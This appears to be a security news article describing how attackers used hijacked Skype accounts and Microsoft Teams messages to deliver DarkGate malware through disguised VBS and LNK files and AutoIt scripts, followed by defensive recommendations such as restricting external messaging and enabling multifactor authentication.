Hackers Abusing Skype and Teams to Deliver the DarkGate Malware

Hackers utilized the Teams and Skype messaging platforms to spread the DarkGate malware to the targeted businesses. When DarkGate malware is installed, a Visual Basic for Applications (VBA) loader script is delivered to victims.

The Windows-based malware known as DARKGATE is capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was initially made public in 2018.

EHA

According to Trend Micro, darkGate attacks were spotted in the Americas, followed closely by those in Asia, the Middle East, and Africa.

Document
FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Distribution of the DarkGate campaign
Distribution of the DarkGate campaign

To deploy and carry out its illicit capabilities, DarkGate also uses the automation and scripting tool AutoIt, which is designed for Windows. AutoIt is a genuine tool, but other malware families commonly utilize it to get through defenses and add an extra layer of obfuscation.

DarkGateInfection Chain Abusing Skype

The attacker simply utilized the hijacked Skype account to hijack an existing conversation thread and send a message that looked like a PDF file but was a malicious VBS script.

“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.

Infection Chain
Infection Chain

Hence, the recipient recognized the sender as a member of a reliable external source. Researchers observed that the curl command, in this case, was used to retrieve the legitimate AutoIt application and the associated malicious files.

Skype message with an embedded malicious attachment posing as a PDF file
Skype message with an embedded malicious attachment posing as a PDF file

Hackers Abusing Microsoft Teams Platform

Another instance included a threat delivering a link through a Microsoft Teams message. In this instance, the victim was exposed to the possibility of spam since the organization’s technology lets them receive notifications from outside users.

Teams message with a malicious attachment
Teams message with a malicious attachment

The attackers concealed a.LNK file in the Teams version of the breach. Additionally, an unidentified external sender sent the sample that abused Teams.

“The downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.

Recommendation

Cybercriminals may use these payloads to spread malware, such as cryptocurrency miners, info stealers, ransomware, malicious and/or abusive remote management tools, and ransomware.

The organization should have control over instant messaging applications so that regulations like prohibiting external domains, limiting attachments, and, if practical, adopting scanning may be enforced. 

If legitimate credentials are compromised, multifactor authentication (MFA) is strongly advised for securing apps. This reduces the threat of attacks utilizing these methods spreading.

Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.